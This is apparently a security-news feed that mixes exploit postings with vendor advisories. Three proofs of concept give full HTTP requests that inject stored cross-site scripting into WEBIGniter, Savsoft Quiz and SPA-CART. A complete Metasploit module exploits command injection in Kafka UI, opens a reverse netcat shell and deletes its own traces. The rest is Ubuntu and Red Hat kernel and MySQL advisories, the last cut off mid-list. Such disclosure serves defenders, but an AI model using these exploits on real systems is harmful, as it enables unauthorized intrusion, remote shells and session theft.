WEBIGniter version 28.7.23 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)# Exploit Author: Sagar Banwa# Date: 19/10/2023# Vendor: https://webigniter.net/# Software: https://webigniter.net/demo# Reference: https://portswigger.net/web-security/cross-site-scripting# Tested on: Windows 10/Kali Linux# CVE : CVE-2023-46391Stored Cross-site scripting(XSS):Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.Steps-To-Reproduce:1. Login to the Account 2. Go to the Categories.3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.phpRequest POST /cms/categories/add HTTP/2Host: demo.webigniter.netCookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 94Origin: https://demo.webigniter.netReferer: https://demo.webigniter.net/cms/categories/addUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersname=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php

WEBIGniter 28.7.23 Cross Site Scripting

Ubuntu Security Notice 6625-3 - Marek Marczykowski-Górecki discovered that the Xen event channel infrastructure implementation in the Linux kernel contained a race condition. An attacker in a guest VM could possibly use this to cause a denial of service. Zheng Wang discovered a use-after-free in the Renesas Ethernet AVB driver in the Linux kernel during device removal. A privileged attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6625-3  
February 20, 2024

linux-raspi, linux-raspi-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-raspi: Linux kernel for Raspberry Pi systems  
- linux-raspi-5.4: Linux kernel for Raspberry Pi systems

Details:

Marek Marczykowski-Górecki discovered that the Xen event channel  
infrastructure implementation in the Linux kernel contained a race  
condition. An attacker in a guest VM could possibly use this to cause a  
denial of service (paravirtualized device unavailability). (CVE-2023-34324)

Zheng Wang discovered a use-after-free in the Renesas Ethernet AVB driver  
in the Linux kernel during device removal. A privileged attacker could use  
this to cause a denial of service (system crash). (CVE-2023-35827)

It was discovered that a race condition existed in the Linux kernel when  
performing operations with kernel objects, leading to an out-of-bounds  
write. A local attacker could use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2023-45863)

黄思聪 discovered that the NFC Controller Interface (NCI) implementation in  
the Linux kernel did not properly handle certain memory allocation failure  
conditions, leading to a null pointer dereference vulnerability. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2023-46343)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1102-raspi    5.4.0-1102.114  
   linux-image-raspi               5.4.0.1102.132  
   linux-image-raspi2              5.4.0.1102.132

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   linux-image-5.4.0-1102-raspi    5.4.0-1102.114~18.04.1  
   linux-image-raspi-hwe-18.04     5.4.0.1102.99

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6625-3  
   https://ubuntu.com/security/notices/USN-6625-1  
   CVE-2023-34324, CVE-2023-35827, CVE-2023-45863, CVE-2023-46343

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1102.114

Ubuntu Security Notice USN-6625-3

A command injection vulnerability exists in Kafka UI versions 0.4.0 through 0.7.1 that allows an attacker to inject and execute arbitrary shell commands via the groovy filter parameter at the topic section.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.',        'Description' => %q{          A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing          an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter          at the `topic` section.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'BobTheShopLifter and Thingstad', # Discovery of the vulnerability CVE-2023-52251        ],        'References' => [          ['CVE', '2023-52251'],          ['URL', 'https://attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251'],          ['URL', 'https://github.com/BobTheShoplifter/CVE-2023-52251-POC']        ],        'DisclosureDate' => '2023-09-27',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => false,        'Targets' => [          [            'Unix/Linux Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => [ARCH_CMD],              'Type' => :unix_cmd,              'Payload' => {                'Encoder' => 'cmd/base64',                'BadChars' => "\x00"              },              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8080,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )  end  def vuln_version?    @version = ''    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'actuator', 'info')    })    if res && res.code == 200 && (res.body.include?('build') || res.body.include?('git'))      res_json = res.get_json_document      unless res_json.blank?        if res.body.include?('build')          @version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x        elsif res.body.include?('git')          # use case where only the git commit id gets returned without the version information          # determine version using the git commit id to match the first 7 chars of the sha commit stored in data/kafka_ui_versions.json file.          git_commit_id = res_json['git']['commit']['id']          kafka_ui_versions_json = JSON.parse(File.read(::File.join(Msf::Config.data_directory, 'kafka_ui_versions.json'), mode: 'rb'))          unless kafka_ui_versions_json.blank?            # loop thru the list of commits and return the version based a match on the first 7 chars of the sha commit else return nil            kafka_ui_versions_json.each do |tag|              if tag['commit']['sha'][0, 7] == git_commit_id                @version = tag['name'].delete_prefix('v')                break              end            end          end        end      end      return Rex::Version.new(@version) <= Rex::Version.new('0.7.1') && Rex::Version.new(@version) >= Rex::Version.new('0.4.0') if @version.match(/\d\.\d\.\d/)    end    false  end  def get_cluster    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters')    })    if res && res.code == 200 && res.body.include?('status')      res_json = res.get_json_document      unless res_json.blank?        # loop thru list of clusters and return an active cluster with topic count > 0 else return nil        res_json.each do |cluster|          if cluster['status'] == 'online' || cluster['topicCount'] > 0            return cluster['name']          end        end      end    end    nil  end  def create_topic(cluster)    topic_name = Rex::Text.rand_text_alphanumeric(4..10)    post_data = {      name: topic_name.to_s,      partitions: 1,      replicationFactor: 1,      configs:        {          'cleanup.policy': 'delete',          'retention.bytes': '-1'        }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?(topic_name.to_s)      res_json = res.get_json_document      unless res_json.blank?        return res_json['name']      end    end    nil  end  def delete_topic(cluster, topic)    res = send_request_cgi({      'method' => 'DELETE',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s)    })    return true if res && res.code == 200    false  end  def produce_message(cluster, topic)    # Create a dummy message to trigger the groovy script execution    post_data = {      partition: 0,      key: 'null',      content: 'null',      keySerde: 'String',      valueSerde: 'String'    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s, 'messages'),      'data' => post_data.to_s    })    return true if res && res.code == 200    false  end  def execute_command(cmd, _opts = {})    payload = "Process p=new ProcessBuilder(\"sh\",\"-c\",\"#{cmd}\").redirectErrorStream(true).start()"    return send_request_cgi({      'method' => 'GET',      'ctype' => 'application/x-www-form-urlencoded',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', @cluster.to_s, 'topics', @new_topic.to_s, 'messages'),      'vars_get' => {        'q' => payload.to_s,        'filterQueryType' => 'GROOVY_SCRIPT',        'attempt' => 2,        'limit' => 100,        'page' => 0,        'seekDirection' => 'FORWARD',        'keySerde' => 'String',        'valueSerde' => 'String',        'seekType' => 'BEGINNING'      }    })  end  def check    vprint_status("Checking if #{peer} can be exploited.")    return CheckCode::Appears("Kafka-ui version: #{@version}") if vuln_version?    unless @version.blank?      if @version.match(/\d\.\d\.\d/)        return CheckCode::Safe("Kafka-ui version: #{@version}")      else        return CheckCode::Detected("Kafka-ui unknown version: #{@version}")      end    end    CheckCode::Safe  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    vprint_status('Searching for active Kafka cluster...')    @cluster = get_cluster    fail_with(Failure::NotFound, 'Could not find or connect to an active Kafka cluster.') if @cluster.nil?    vprint_good("Active Kafka cluster found: #{@cluster}")    vprint_status('Creating a new topic...')    @new_topic = create_topic(@cluster)    fail_with(Failure::Unknown, 'Could not create a new topic.') if @new_topic.nil?    vprint_good("New topic created: #{@new_topic}")    vprint_status('Trigger Groovy script payload execution by creating a message...')    fail_with(Failure::PayloadFailed, 'Could not trigger the Groovy script payload execution.') unless produce_message(@cluster, @new_topic)    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    end    # cleaning up the mess and remove new created topic    vprint_status('Removing tracks...')    if delete_topic(@cluster, @new_topic)      vprint_good("Successfully deleted topic #{@new_topic}.")    else      print_error("Could not delete topic #{@new_topic}. Manually cleaning required.")    end  endend

Kafka UI 0.7.1 Command Injection

Savsoft Quiz version 6.0 Enterprise suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting# Date: 2024-01-03# Exploit Author: Eren Sen# Vendor: SAVSOFT QUIZ# Vendor Homepage: https://savsoftquiz.com# Software Link: https://savsoftquiz.com/web/index.php/online-demo/# Version: < 6.0# CVE-ID: N/A# Tested on: Kali Linux / Windows 10# Vulnerabilities Discovered Date : 2024/01/03# Persistent Cross Site Scripting (XSS) Vulnerability# Vulnerable Parameter Type: POST# Vulnerable Parameter: quiz_name# Proof of Concepts:https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13# HTTP Request:POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1Host: demos1.softaculous.comCookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxxContent-Length: 411Cache-Control: max-age=0Sec-Ch-Ua:Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1Origin: https://demos1.softaculous.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_newAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closequiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=

Savsoft Quiz 6.0 Enterprise Cross Site Scripting

SPA-CART CMS version 1.9.0.3 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: SPA-CART CMS - Stored XSS  
# Date: 2024-01-03  
# Exploit Author: Eren Sen  
# Vendor: SPA-Cart  
# Vendor Homepage: https://spa-cart.com/  
# Software Link: https://demo.spa-cart.com/  
# Version: [1.9.0.3]  
# CVE-ID: N/A  
# Tested on: Kali Linux / Windows 10  
# Vulnerabilities Discovered Date : 2024/01/03

# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: descr

# Proof of Concept: demo.spa-cart.com/product/258

# HTTP Request:

POST ////admin/products/258 HTTP/2  
Host: demo.spa-cart.com  
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx  
Content-Length: 1906  
Sec-Ch-Ua:  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36  
Sec-Ch-Ua-Platform: ""  
Origin: https://demo.spa-cart.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.spa-cart.com////admin/products/258  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="mode"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="sku"

SKU386

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="name"

asdf

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads  
------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="avail"

1000

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="price"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="list_price"

2

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="weight"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categoryid"

42

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

8

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

37

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="brandid"

4

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="status"

1

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl

Content-Disposition: form-data; name="descr"

<script>alert(1)</script>

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="title_tag"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl--

SPA-CART CMS 1.9.0.3 Cross Site Scripting

Red Hat Security Advisory 2024-0897-03 - An update for kernel is now available for Red Hat Enterprise Linux 8. Issues addressed include null pointer, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0897.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security update  
Advisory ID:        RHSA-2024:0897-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0897  
Issue date:         2024-02-20  
Revision:           03  
CVE Names:          CVE-2022-3545  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)

* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)

* kernel: inactive elements in nft_pipapo_walk (CVE-2023-6817)

* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)

* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)

* kernel: nfp: use-after-free in area_cache_get() (CVE-2022-3545)

* kernel: null-ptr-deref vulnerabilities in sl_tx_timeout in drivers/net/slip (CVE-2022-41858)

* kernel: HID: check empty report_list in hid_validate_values() (CVE-2023-1073)

* kernel: Possible use-after-free since the two fdget() during vhost_net_set_backend() (CVE-2023-1838)

* kernel: NULL pointer dereference in can_rcv_filter (CVE-2023-2166)

* kernel: Slab-out-of-bound read in compare_netdev_and_ip (CVE-2023-2176)

* kernel: A heap out-of-bounds write when function perf_read_group is called and sibling_list is smaller than its child's sibling_list (CVE-2023-5717)

* kernel: NULL pointer dereference in nvmet_tcp_build_iovec (CVE-2023-6356)

* kernel: NULL pointer dereference in nvmet_tcp_execute_request (CVE-2023-6535)

* kernel: NULL pointer dereference in __nvmet_req_complete (CVE-2023-6536)

* kernel: Out-Of-Bounds Read vulnerability in smbCalcSize (CVE-2023-6606)

* kernel: OOB Access in smb2_dump_detail (CVE-2023-6610)

* kernel: use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c (CVE-2023-40283)

* kernel: SEV-ES local priv escalation (CVE-2023-46813)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-3545

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2087568  
https://bugzilla.redhat.com/show_bug.cgi?id=2144379  
https://bugzilla.redhat.com/show_bug.cgi?id=2161310  
https://bugzilla.redhat.com/show_bug.cgi?id=2173403  
https://bugzilla.redhat.com/show_bug.cgi?id=2187813  
https://bugzilla.redhat.com/show_bug.cgi?id=2187931  
https://bugzilla.redhat.com/show_bug.cgi?id=2231800  
https://bugzilla.redhat.com/show_bug.cgi?id=2237757  
https://bugzilla.redhat.com/show_bug.cgi?id=2244723  
https://bugzilla.redhat.com/show_bug.cgi?id=2245514  
https://bugzilla.redhat.com/show_bug.cgi?id=2246944  
https://bugzilla.redhat.com/show_bug.cgi?id=2246945  
https://bugzilla.redhat.com/show_bug.cgi?id=2253611  
https://bugzilla.redhat.com/show_bug.cgi?id=2253614  
https://bugzilla.redhat.com/show_bug.cgi?id=2253908  
https://bugzilla.redhat.com/show_bug.cgi?id=2254052  
https://bugzilla.redhat.com/show_bug.cgi?id=2254053  
https://bugzilla.redhat.com/show_bug.cgi?id=2254054  
https://bugzilla.redhat.com/show_bug.cgi?id=2255139

Red Hat Security Advisory 2024-0897-03

Red Hat Security Advisory 2024-0894-03 - An update for the mysql:8.0 module is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0894.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: mysql:8.0 security updateAdvisory ID:        RHSA-2024:0894-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0894Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2022-4899====================================================================Summary: An update for the mysql:8.0 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.Security Fix(es):* mysql: InnoDB unspecified vulnerability (CPU Apr 2023) (CVE-2023-21911)* mysql: Server: DDL unspecified vulnerability (CPU Apr 2023) (CVE-2023-21919, CVE-2023-21929, CVE-2023-21933)* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2023) (CVE-2023-21920, CVE-2023-21935, CVE-2023-21945, CVE-2023-21946, CVE-2023-21976, CVE-2023-21977, CVE-2023-21982)* mysql: Server: Components Services unspecified vulnerability (CPU Apr 2023) (CVE-2023-21940, CVE-2023-21947, CVE-2023-21962)* mysql: Server: Partition unspecified vulnerability (CPU Apr 2023) (CVE-2023-21953, CVE-2023-21955)* mysql: Server: JSON unspecified vulnerability (CPU Apr 2023) (CVE-2023-21966)* mysql: Server: DML unspecified vulnerability (CPU Apr 2023) (CVE-2023-21972)* mysql: Client programs unspecified vulnerability (CPU Apr 2023) (CVE-2023-21980)* mysql: Server: Replication unspecified vulnerability (CPU Jul 2023) (CVE-2023-22005, CVE-2023-22007, CVE-2023-22057)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22008)* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2023) (CVE-2023-22032, CVE-2023-22059, CVE-2023-22064, CVE-2023-22065, CVE-2023-22070, CVE-2023-22078, CVE-2023-22079, CVE-2023-22092, CVE-2023-22103, CVE-2023-22110, CVE-2023-22112)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22033)* mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2023) (CVE-2023-22046, CVE-2023-22054, CVE-2023-22056)* mysql: Client programs unspecified vulnerability (CPU Jul 2023) (CVE-2023-22053)* mysql: Server: DDL unspecified vulnerability (CPU Jul 2023) (CVE-2023-22058)* mysql: InnoDB unspecified vulnerability (CPU Oct 2023) (CVE-2023-22066, CVE-2023-22068, CVE-2023-22084, CVE-2023-22097, CVE-2023-22104, CVE-2023-22114)* mysql: Server: UDF unspecified vulnerability (CPU Oct 2023) (CVE-2023-22111)* mysql: Server: DML unspecified vulnerability (CPU Oct 2023) (CVE-2023-22115)* mysql: Server: RAPID unspecified vulnerability (CPU Jan 2024) (CVE-2024-20960)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2024) (CVE-2024-20963)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2024) (CVE-2024-20964)* mysql: Server: Replication unspecified vulnerability (CPU Jan 2024) (CVE-2024-20967)* mysql: Server: Options unspecified vulnerability (CPU Jan 2024) (CVE-2024-20968)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20969)* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2024) (CVE-2024-20961, CVE-2024-20962, CVE-2024-20965, CVE-2024-20966, CVE-2024-20970, CVE-2024-20971, CVE-2024-20972, CVE-2024-20973, CVE-2024-20974, CVE-2024-20976, CVE-2024-20977, CVE-2024-20978, CVE-2024-20982)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20981)* mysql: Server: DML unspecified vulnerability (CPU Jan 2024) (CVE-2024-20983)* mysql: Server : Security : Firewall unspecified vulnerability (CPU Jan 2024) (CVE-2024-20984)* mysql: Server: UDF unspecified vulnerability (CPU Jan 2024) (CVE-2024-20985)* zstd: mysql: buffer overrun in util.c (CVE-2022-4899)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2023) (CVE-2023-22038)* mysql: Server: Pluggable Auth unspecified vulnerability (CPU Jul 2023) (CVE-2023-22048)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Oct 2023) (CVE-2023-22113)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* Fix for MySQL bug #33630199 in 8.0.32 introduces regression when --set-gtid-purged=OFF (RHEL-22452)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-4899References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2179864https://bugzilla.redhat.com/show_bug.cgi?id=2188109https://bugzilla.redhat.com/show_bug.cgi?id=2188113https://bugzilla.redhat.com/show_bug.cgi?id=2188115https://bugzilla.redhat.com/show_bug.cgi?id=2188116https://bugzilla.redhat.com/show_bug.cgi?id=2188117https://bugzilla.redhat.com/show_bug.cgi?id=2188118https://bugzilla.redhat.com/show_bug.cgi?id=2188119https://bugzilla.redhat.com/show_bug.cgi?id=2188120https://bugzilla.redhat.com/show_bug.cgi?id=2188121https://bugzilla.redhat.com/show_bug.cgi?id=2188122https://bugzilla.redhat.com/show_bug.cgi?id=2188123https://bugzilla.redhat.com/show_bug.cgi?id=2188124https://bugzilla.redhat.com/show_bug.cgi?id=2188125https://bugzilla.redhat.com/show_bug.cgi?id=2188127https://bugzilla.redhat.com/show_bug.cgi?id=2188128https://bugzilla.redhat.com/show_bug.cgi?id=2188129https://bugzilla.redhat.com/show_bug.cgi?id=2188130https://bugzilla.redhat.com/show_bug.cgi?id=2188131https://bugzilla.redhat.com/show_bug.cgi?id=2188132https://bugzilla.redhat.com/show_bug.cgi?id=2224211https://bugzilla.redhat.com/show_bug.cgi?id=2224212https://bugzilla.redhat.com/show_bug.cgi?id=2224213https://bugzilla.redhat.com/show_bug.cgi?id=2224214https://bugzilla.redhat.com/show_bug.cgi?id=2224215https://bugzilla.redhat.com/show_bug.cgi?id=2224216https://bugzilla.redhat.com/show_bug.cgi?id=2224217https://bugzilla.redhat.com/show_bug.cgi?id=2224218https://bugzilla.redhat.com/show_bug.cgi?id=2224219https://bugzilla.redhat.com/show_bug.cgi?id=2224220https://bugzilla.redhat.com/show_bug.cgi?id=2224221https://bugzilla.redhat.com/show_bug.cgi?id=2224222https://bugzilla.redhat.com/show_bug.cgi?id=2245014https://bugzilla.redhat.com/show_bug.cgi?id=2245015https://bugzilla.redhat.com/show_bug.cgi?id=2245016https://bugzilla.redhat.com/show_bug.cgi?id=2245017https://bugzilla.redhat.com/show_bug.cgi?id=2245018https://bugzilla.redhat.com/show_bug.cgi?id=2245019https://bugzilla.redhat.com/show_bug.cgi?id=2245020https://bugzilla.redhat.com/show_bug.cgi?id=2245021https://bugzilla.redhat.com/show_bug.cgi?id=2245022https://bugzilla.redhat.com/show_bug.cgi?id=2245023https://bugzilla.redhat.com/show_bug.cgi?id=2245024https://bugzilla.redhat.com/show_bug.cgi?id=2245026https://bugzilla.redhat.com/show_bug.cgi?id=2245027https://bugzilla.redhat.com/show_bug.cgi?id=2245028https://bugzilla.redhat.com/show_bug.cgi?id=2245029https://bugzilla.redhat.com/show_bug.cgi?id=2245030https://bugzilla.redhat.com/show_bug.cgi?id=2245031https://bugzilla.redhat.com/show_bug.cgi?id=2245032https://bugzilla.redhat.com/show_bug.cgi?id=2245033https://bugzilla.redhat.com/show_bug.cgi?id=2245034https://bugzilla.redhat.com/show_bug.cgi?id=2258771https://bugzilla.redhat.com/show_bug.cgi?id=2258772https://bugzilla.redhat.com/show_bug.cgi?id=2258773https://bugzilla.redhat.com/show_bug.cgi?id=2258774https://bugzilla.redhat.com/show_bug.cgi?id=2258775https://bugzilla.redhat.com/show_bug.cgi?id=2258776https://bugzilla.redhat.com/show_bug.cgi?id=2258777https://bugzilla.redhat.com/show_bug.cgi?id=2258778https://bugzilla.redhat.com/show_bug.cgi?id=2258779https://bugzilla.redhat.com/show_bug.cgi?id=2258780https://bugzilla.redhat.com/show_bug.cgi?id=2258781https://bugzilla.redhat.com/show_bug.cgi?id=2258782https://bugzilla.redhat.com/show_bug.cgi?id=2258783https://bugzilla.redhat.com/show_bug.cgi?id=2258784https://bugzilla.redhat.com/show_bug.cgi?id=2258785https://bugzilla.redhat.com/show_bug.cgi?id=2258787https://bugzilla.redhat.com/show_bug.cgi